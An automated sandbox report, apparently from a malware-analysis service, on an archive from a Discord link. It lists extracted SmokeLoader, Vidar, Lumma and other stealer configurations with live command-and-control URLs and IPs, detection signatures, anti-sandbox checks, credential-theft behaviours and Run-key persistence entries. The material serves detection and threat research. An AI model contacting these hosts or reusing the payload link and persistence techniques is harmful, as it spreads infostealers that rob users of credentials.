fabookie | hxxps://cdn[.]discordapp[.]com/attachments/1220295157723959339/1220678970400440370/ver3_file[.]rar?ex=660fd0e1&is=65fd5be1&hm=6731be839531b1cd5f9780c50a856b5c05571fdd6ba89a55f3dacabdf7c1be84&

Analysis

max time kernel
721s
max time network
723s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
22-03-2024 16:11

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

https://cdn.discordapp.com/attachments/1220295157723959339/1220678970400440370/ver3_file.rar?ex=660fd0e1&is=65fd5be1&hm=6731be839531b1cd5f9780c50a856b5c05571fdd6ba89a55f3dacabdf7c1be84&

Malware Config

Extracted

Family

smokeloader

Botnet

pub3

Extracted

Family

vidar

Version

8.4

Botnet

473851422af56ec6b6c329e5cb4d622d

https://steamcommunity.com/profiles/76561199654112719

https://t.me/r2d0s

Attributes

profile_id_v2
473851422af56ec6b6c329e5cb4d622d
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0

Extracted

Family

gcleaner

185.172.128.90

5.42.65.115

Extracted

Family

smokeloader

Version

2022

http://nidoe.org/tmp/index.php

http://sodez.ru/tmp/index.php

http://uama.com.ua/tmp/index.php

http://talesofpirates.net/tmp/index.php

rc4.i32

Extracted

Family

vidar

Version

8.4

Botnet

4cf8d799a3641f9821e54be56c960e28

https://steamcommunity.com/profiles/76561199654112719

https://t.me/r2d0s

Attributes

profile_id_v2
4cf8d799a3641f9821e54be56c960e28
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0

Extracted

Family

fabookie

http://app.alie3ksgaa.com/check/safe

Extracted

Family

lumma

https://relevantvoicelesskw.shop/api

Extracted

Family

socks5systemz

http://bnlfybu.com/search/?q=67e28dd86c0ea7794406f94d7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa44e8889b5e4fa9281ae978f671ea771795af8e05c645db22f31dfe339426fa11af66c152adb719a9577e55b8603e983a608ffe10c2eb959232

http://bnlfybu.com/search/?q=67e28dd86c0ea7794406f94d7c27d78406abdd88be4b12eab517aa5c96bd86e490874896148ab2865b77f80ebad9cc0f7cb63037ed2ab423a4334383ba915d911ec07bb606a0708727e40ea678c45abbe74ffb0e2807e12571c17f3e83fe16c1ee94983fcd679f

Signatures

Detect Fabookie payload 1 IoCs

resource	yara_rule
behavioral1/memory/5724-848-0x0000000002F50000-0x000000000307C000-memory.dmp	family_fabookie

Detect Vidar Stealer 6 IoCs

stealer

resource	yara_rule
behavioral1/memory/5384-667-0x0000000000400000-0x0000000000644000-memory.dmp	family_vidar_v7
behavioral1/memory/5384-679-0x0000000000400000-0x0000000000644000-memory.dmp	family_vidar_v7
behavioral1/memory/1304-725-0x0000000000400000-0x0000000000644000-memory.dmp	family_vidar_v7
behavioral1/memory/1304-719-0x0000000000400000-0x0000000000644000-memory.dmp	family_vidar_v7
behavioral1/memory/1304-713-0x0000000000400000-0x0000000000644000-memory.dmp	family_vidar_v7
behavioral1/memory/5384-697-0x0000000000400000-0x0000000000644000-memory.dmp	family_vidar_v7

Detect ZGRat V1 4 IoCs

resource	yara_rule
behavioral1/files/0x00070000000234f4-293.dat	family_zgrat_v1
behavioral1/files/0x00070000000234f4-344.dat	family_zgrat_v1
behavioral1/files/0x00070000000234f4-367.dat	family_zgrat_v1
behavioral1/memory/2496-577-0x0000000000490000-0x000000000099E000-memory.dmp	family_zgrat_v1

Fabookie
Fabookie is facebook account info stealer.
spyware stealer fabookie
GCleaner
GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.
loader gcleaner
Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 4 IoCs

resource	yara_rule
behavioral1/memory/5740-706-0x0000000005170000-0x0000000005A5B000-memory.dmp	family_glupteba
behavioral1/memory/5692-718-0x0000000000400000-0x0000000003130000-memory.dmp	family_glupteba
behavioral1/memory/5740-726-0x0000000000400000-0x0000000003130000-memory.dmp	family_glupteba
behavioral1/memory/5692-796-0x0000000000400000-0x0000000003130000-memory.dmp	family_glupteba

Lumma Stealer
An infostealer written in C++ first seen in August 2022.
stealer lumma
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

resource	yara_rule
behavioral1/memory/2468-714-0x0000000000400000-0x000000000048C000-memory.dmp	family_redline

RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socks5Systemz
Socks5Systemz is a botnet written in C++.
botnet socks5systemz
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 18 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	setup.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	OlRwiKX7EYNxfrbE5a92.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorha.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorha.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Tk4gUQCNbR819EceHin_.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorha.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	8c6ea728e2.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	a9p75xZmBYFqxiIiCYhm.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	NIyTViq8eDXvz9CBundc.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorha.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorha.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorha.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorha.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	2guyqrpGkKfND7jVGbND7CI2.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorha.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorha.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	N2swwn6Z3Cg1hvjnr7VR.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Myh89dg1k8SeHjUEE0Hq.exe

Blocklisted process makes network request 9 IoCs

flow	pid	Process
488	1304	RegAsm.exe
520	1304	RegAsm.exe
522	1304	RegAsm.exe
525	1304	RegAsm.exe
529	1304	RegAsm.exe
542	5324	RegAsm.exe
738	5892	rundll32.exe
830	6084	rundll32.exe
833	3004	rundll32.exe

Creates new service(s) 1 TTPs
persistence

Windows Service
T1543.003
Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
2052	netsh.exe
4252	netsh.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

.NET Reactor proctector 4 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral1/files/0x00070000000234f4-293.dat	net_reactor
behavioral1/files/0x00070000000234f4-344.dat	net_reactor
behavioral1/files/0x00070000000234f4-367.dat	net_reactor
behavioral1/memory/2496-577-0x0000000000490000-0x000000000099E000-memory.dmp	net_reactor

Checks BIOS information in registry 2 TTPs 38 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2guyqrpGkKfND7jVGbND7CI2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Tk4gUQCNbR819EceHin_.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2guyqrpGkKfND7jVGbND7CI2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	OlRwiKX7EYNxfrbE5a92.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	N2swwn6Z3Cg1hvjnr7VR.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Myh89dg1k8SeHjUEE0Hq.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	a9p75xZmBYFqxiIiCYhm.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	a9p75xZmBYFqxiIiCYhm.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	NIyTViq8eDXvz9CBundc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	8c6ea728e2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Tk4gUQCNbR819EceHin_.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	OlRwiKX7EYNxfrbE5a92.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Myh89dg1k8SeHjUEE0Hq.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	NIyTViq8eDXvz9CBundc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	8c6ea728e2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	N2swwn6Z3Cg1hvjnr7VR.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorha.exe

Checks computer location settings 2 TTPs 11 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	setup.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	_sMdS5SXAFvQf2QncmxDg1wN.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	2guyqrpGkKfND7jVGbND7CI2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	8c6ea728e2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	Install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	L8hm6kwLATQz6S2fMn4cVyNN.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	j6ClvmutSN6hUixkjGMixepv.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	edgfLjK.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	OlRwiKX7EYNxfrbE5a92.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	explorha.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	NIyTViq8eDXvz9CBundc.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS131.lnk	2guyqrpGkKfND7jVGbND7CI2.exe

Executes dropped EXE 61 IoCs

pid	Process
5084	setup.exe
3112	8wYfsbzIhhMlVg7PGNu8B15u.exe
2496	fIQj5WEYwVW9koZrQrGg9EWZ.exe
5100	xxuJ1yyURX4tFm310L_gVLlB.exe
4552	4p8e02_zESQoARv4BD86syqL.exe
3504	EL2Valb7nJ1aCGWwenVPdrf8.exe
5652	aEaOLyK0bw44F97bJ3Haks6C.exe
5672	L8hm6kwLATQz6S2fMn4cVyNN.exe
5520	zsEf6XWGGxzRmnVTKexLrc_e.exe
5704	_sMdS5SXAFvQf2QncmxDg1wN.exe
5724	XHiYShJ8TJf5mNSTLvPK2nyH.exe
5712	j6ClvmutSN6hUixkjGMixepv.exe
5740	d83frV2Rj9Wa_Wazpbh4_p98.exe
5768	2guyqrpGkKfND7jVGbND7CI2.exe
5692	7KsMJEa7ziqWauV4kdgZCGKn.exe
6000	aEaOLyK0bw44F97bJ3Haks6C.tmp
3764	Install.exe
2712	Cm83ixjY2n3PECS3wKVi7ZuT.exe
5128	HYcK04fDpm59NE1iuqeohCe6.exe
3972	zSq9_LNldKYh1CBz04gNfS_1.exe
5324	nukephp32.exe
5436	Install.exe
5584	nukephp32.exe
5672	dckuybanmlgp.exe
5892	_NHunBZSe8eifB7b8W9h.exe
3656	7KsMJEa7ziqWauV4kdgZCGKn.exe
2848	d83frV2Rj9Wa_Wazpbh4_p98.exe
4724	EGIJKEHCAK.exe
4020	csrss.exe
5344	injector.exe
4972	foUkoPZ.exe
3416	windefender.exe
5676	windefender.exe
2840	edgfLjK.exe
3288	NIyTViq8eDXvz9CBundc.exe
5592	zWVaRgE_VfJUi5dB8iqZVzds.exe
5844	OlRwiKX7EYNxfrbE5a92.exe
2280	FlJqSiuL8X7ZyLEod2f6.exe
5052	explorha.exe
4884	fqaEFn20tPKtGTDCoMLJ.exe
840	explorha.exe
6096	8c6ea728e2.exe
3048	explorha.exe
2052	explorha.exe
2532	dcb505dc2b9d8aac05f4ca0727f5eadb.exe
3664	explorha.exe
1432	713674d5e968cbe2102394be0b2bae6f.exe
752	1bf850b4d9587c1017a75a47680584c4.exe
2444	explorha.exe
2216	cctbhgt
4188	explorha.exe
3092	N2swwn6Z3Cg1hvjnr7VR.exe
4184	explorha.exe
4736	Tk4gUQCNbR819EceHin_.exe
2796	Myh89dg1k8SeHjUEE0Hq.exe
3360	oHuQIWup1i8YSbvGAEZQ.exe
1140	7hHumx0NIaQCH5Mt1mE9.exe
2784	a9p75xZmBYFqxiIiCYhm.exe
4708	gXp1YtBBM6QPr6jEFuGe.exe
868	gEsNgzNQFG_H09rqJ_UR.exe
4748	explorha.exe

Identifies Wine through registry keys 2 TTPs 17 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Software\Wine	NIyTViq8eDXvz9CBundc.exe
Key opened	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Software\Wine	a9p75xZmBYFqxiIiCYhm.exe
Key opened	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Software\Wine	Myh89dg1k8SeHjUEE0Hq.exe
Key opened	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Software\Wine	OlRwiKX7EYNxfrbE5a92.exe
Key opened	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Software\Wine	explorha.exe
Key opened	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Software\Wine	explorha.exe
Key opened	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Software\Wine	explorha.exe
Key opened	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Software\Wine	N2swwn6Z3Cg1hvjnr7VR.exe
Key opened	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Software\Wine	explorha.exe
Key opened	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Software\Wine	Tk4gUQCNbR819EceHin_.exe
Key opened	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Software\Wine	2guyqrpGkKfND7jVGbND7CI2.exe
Key opened	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Software\Wine	explorha.exe
Key opened	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Software\Wine	explorha.exe
Key opened	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Software\Wine	explorha.exe
Key opened	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Software\Wine	8c6ea728e2.exe
Key opened	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Software\Wine	explorha.exe
Key opened	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Software\Wine	explorha.exe

Loads dropped DLL 8 IoCs

pid	Process
6000	aEaOLyK0bw44F97bJ3Haks6C.tmp
5704	_sMdS5SXAFvQf2QncmxDg1wN.exe
5704	_sMdS5SXAFvQf2QncmxDg1wN.exe
2496	fIQj5WEYwVW9koZrQrGg9EWZ.exe
5892	rundll32.exe
6068	rundll32.exe
6084	rundll32.exe
3004	rundll32.exe

Reads WinSCP keys stored on the system 2 TTPs
Tries to access WinSCP stored sessions.
spyware stealer

Data from Local System
T1005

Credentials in Registry
T1552.002
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Themida packer 17 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/files/0x00090000000234aa-84.dat	themida
behavioral1/files/0x00090000000234aa-87.dat	themida
behavioral1/files/0x00090000000234aa-88.dat	themida
behavioral1/memory/5084-89-0x00007FF637E20000-0x00007FF638785000-memory.dmp	themida
behavioral1/memory/5084-94-0x00007FF637E20000-0x00007FF638785000-memory.dmp	themida
behavioral1/memory/5084-96-0x00007FF637E20000-0x00007FF638785000-memory.dmp	themida
behavioral1/memory/5084-97-0x00007FF637E20000-0x00007FF638785000-memory.dmp	themida
behavioral1/memory/5084-98-0x00007FF637E20000-0x00007FF638785000-memory.dmp	themida
behavioral1/memory/5084-99-0x00007FF637E20000-0x00007FF638785000-memory.dmp	themida
behavioral1/memory/5084-100-0x00007FF637E20000-0x00007FF638785000-memory.dmp	themida
behavioral1/memory/5084-101-0x00007FF637E20000-0x00007FF638785000-memory.dmp	themida
behavioral1/memory/5084-102-0x00007FF637E20000-0x00007FF638785000-memory.dmp	themida
behavioral1/memory/5084-127-0x00007FF637E20000-0x00007FF638785000-memory.dmp	themida
behavioral1/memory/5084-280-0x00007FF637E20000-0x00007FF638785000-memory.dmp	themida
behavioral1/memory/5084-305-0x00007FF637E20000-0x00007FF638785000-memory.dmp	themida
behavioral1/memory/5084-540-0x00007FF637E20000-0x00007FF638785000-memory.dmp	themida
behavioral1/memory/5084-729-0x00007FF637E20000-0x00007FF638785000-memory.dmp	themida

Unexpected DNS network traffic destination 1 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	141.98.234.31

Accesses Microsoft Outlook profiles 1 TTPs 18 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	8wYfsbzIhhMlVg7PGNu8B15u.exe
Key opened	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	MsBuild.exe
Key opened	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	2guyqrpGkKfND7jVGbND7CI2.exe
Key opened	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	8c6ea728e2.exe
Key opened	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	j6ClvmutSN6hUixkjGMixepv.exe
Key opened	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	MsBuild.exe
Key opened	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	2guyqrpGkKfND7jVGbND7CI2.exe
Key opened	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	NIyTViq8eDXvz9CBundc.exe
Key opened	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	8c6ea728e2.exe
Key opened	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	j6ClvmutSN6hUixkjGMixepv.exe
Key opened	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	MsBuild.exe
Key opened	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	NIyTViq8eDXvz9CBundc.exe
Key opened	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	j6ClvmutSN6hUixkjGMixepv.exe
Key opened	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	8wYfsbzIhhMlVg7PGNu8B15u.exe
Key opened	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	8wYfsbzIhhMlVg7PGNu8B15u.exe
Key opened	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	2guyqrpGkKfND7jVGbND7CI2.exe
Key opened	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	NIyTViq8eDXvz9CBundc.exe
Key opened	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	8c6ea728e2.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 10 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdobeUpdaterV168_2fe3868764b70dafe5d89d79466c63e3 = "C:\\Users\\Admin\\AppData\\Local\\AdobeUpdaterV168_2fe3868764b70dafe5d89d79466c63e3\\AdobeUpdaterV168.exe"	j6ClvmutSN6hUixkjGMixepv.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	d83frV2Rj9Wa_Wazpbh4_p98.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	csrss.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\8c6ea728e2.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000022001\\8c6ea728e2.exe"	explorha.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RageMP131 = "C:\\Users\\Admin\\AppData\\Local\\RageMP131\\RageMP131.exe"	2guyqrpGkKfND7jVGbND7CI2.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdobeUpdaterV168_ff2364a0be3d20e46cc69efb36afe9a5 = "C:\\Users\\Admin\\AppData\\Local\\AdobeUpdaterV168_ff2364a0be3d20e46cc69efb36afe9a5\\AdobeUpdaterV168.exe"	j6ClvmutSN6hUixkjGMixepv.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	7KsMJEa7ziqWauV4kdgZCGKn.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdobeUpdaterV131_a85d7ffddf2ee5c09c761a01b187853e = "C:\\Users\\Admin\\AppData\\Local\\AdobeUpdaterV131_a85d7ffddf2ee5c09c761a01b187853e\\AdobeUpdaterV131.exe"	2guyqrpGkKfND7jVGbND7CI2.exe
